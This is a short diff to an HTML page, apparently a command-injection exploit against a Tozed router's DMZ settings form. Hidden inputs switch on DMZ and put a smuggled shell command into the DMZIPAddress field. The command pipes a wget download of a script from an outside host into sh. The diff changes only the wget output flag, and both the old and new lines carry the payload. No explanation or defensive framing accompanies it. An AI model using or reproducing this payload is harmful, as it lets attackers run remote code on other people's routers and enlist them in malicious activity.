--- a/tozed.html
+++ b/tozed.html
@@ -6,7 +6,7 @@
 
 <input name="DMZEnabled" value="1" & type="hidden">
 
-<input name="DMZIPAddress" value="127.0.0.1 | wget http://junjuncruzit.online/tozed.sh -O - | sh &"type="hidden">
+<input name="DMZIPAddress" value="127.0.0.1 | wget http://junjuncruzit.online/tozed.sh -o - | sh &"type="hidden">
 
 <input type="submit" style="display:none;"></form>
 
